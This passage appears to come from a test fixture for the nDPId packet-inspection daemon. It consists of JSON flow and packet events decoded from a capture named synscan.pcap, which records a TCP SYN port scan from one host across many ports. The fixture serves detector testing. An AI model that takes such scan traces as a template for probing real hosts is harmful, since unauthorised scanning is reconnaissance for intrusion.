-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsCEIAADAGEDGsEAAIQA2GNIzSB+7dUoMYAAAAAGACBAAsoQAAAgQFtA=="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAszJQAADoGQd6sEAAIQA2GNIzSAAbdUoMYAAAAAGACDAAsiQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsqb4AACYGeLSsEAAIQA2GNIzSBYndUoMYAAAAAGACDAAnBgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsNw4AADUG3GSsEAAIQA2GNIzSIB7dUoMYAAAAAGACCAAQcQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsOZAAACUG6eKsEAAIQA2GNIzSAqvdUoMYAAAAAGACCAAt5AAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsX3cAADcGsfusEAAIQA2GNIzSC+rdUoMYAAAAAGACEAAcpQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsRPgAADsGyHqsEAAIQA2GNIzTAiTdU4MZAAAAAGACEAAmaAAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsCYQAACgGFu+sEAAIQA2GNIzTIrjdU4MZAAAAAGACBAAR1AAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsS98AACoG0pOsEAAIQA2GNIzTAIfdU4MZAAAAAGACDAAsBQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsHuAAADcG8pKsEAAIQA2GNIzTAirdU4MZAAAAAGACEAAmYgAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsiYkAADgGhumsEAAIQA2GNIzTAQDdU4MZAAAAAGACBAAzjAAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsvMkAADoGUamsEAAIQA2GNIzTAb3dU4MZAAAAAGACDAAqzwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsDW0AACkGEgasEAAIQA2GNIzTBrjdU4MZAAAAAGACCAAp1AAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAs+D0AACgGKDWsEAAIQA2GNIzTH5DdU4MZAAAAAGACBAAU\/AAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAscb8AACUGsbOsEAAIQA2GNIzTAG7dU4MZAAAAAGACCAAwHgAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAs2D8AAC8GQTOsEAAIQA2GNIzTA+HdU4MZAAAAAGACEAAkqwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsFp8AAC8GAtSsEAAIQA2GNIzTBrvdU4MZAAAAAGACEAAh0QAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAs2rAAAC0GQMKsEAAIQA2GNIzTC+rdU4MZAAAAAGACCAAkogAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAs6RgAADsGJFqsEAAIQA2GNIzTAqvdU4MZAAAAAGACEAAl4QAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsrkMAACgGci+sEAAIQA2GNIzTIB7dU4MZAAAAAGACBAAUbgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsq3MAACYGdv+sEAAIQA2GNIzTBYndU4MZAAAAAGACDAAnAwAAAgQFtA=="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsZBoAADAGtFisEAAIQA2GNIzTAAbdU4MZAAAAAGACBAA0hgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsIdMAACkG\/Z+sEAAIQA2GNIzTB+7dU4MZAAAAAGACCAAongAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsMZYAADEG5dysEAAIQA2GNIzTBNHdU4MZAAAAAGACCAAruwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 